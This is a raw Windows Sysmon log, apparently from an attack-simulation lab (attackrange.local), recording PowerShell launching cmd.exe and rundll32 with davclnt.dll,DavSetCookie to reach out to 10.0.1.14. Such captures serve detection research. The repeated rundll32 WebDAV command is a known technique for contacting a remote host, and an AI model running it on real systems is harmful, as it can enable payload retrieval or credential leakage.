154100x800000000000000020142074Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-16 18:11:57.712{EF490992-5BED-6413-4521-00000000C702}5480C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooC:\Users\Administrator\MSWIN-SERVER\Administrator{EF490992-EEBB-6411-9D9F-620000000000}0x629f9d2HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667{EF490992-5BED-6413-4421-00000000C702}2540C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooMSWIN-SERVER\Administrator 154100x800000000000000020142065Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-16 18:11:57.662{EF490992-5BED-6413-4421-00000000C702}2540C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c rundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooC:\Users\Administrator\MSWIN-SERVER\Administrator{EF490992-EEBB-6411-9D9F-620000000000}0x629f9d2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{EF490992-EECB-6411-6C01-00000000C702}4440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MSWIN-SERVER\Administrator 154100x800000000000000020125104Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-16 18:10:40.806{EF490992-5BA0-6413-3B21-00000000C702}2448C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooC:\Users\Administrator\MSWIN-SERVER\Administrator{EF490992-EEBB-6411-9D9F-620000000000}0x629f9d2HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667{EF490992-5BA0-6413-3A21-00000000C702}4760C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooMSWIN-SERVER\Administrator 154100x800000000000000020125069Microsoft-Windows-Sysmon/Operationalmswin-server.attackrange.local-2023-03-16 18:10:40.758{EF490992-5BA0-6413-3A21-00000000C702}4760C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c rundll32.exe c:\windows\system32\davclnt.dll,DavSetCookie 10.0.1.14 http://10.0.1.14/fooC:\Users\Administrator\MSWIN-SERVER\Administrator{EF490992-EEBB-6411-9D9F-620000000000}0x629f9d2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{EF490992-EECB-6411-6C01-00000000C702}4440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MSWIN-SERVER\Administrator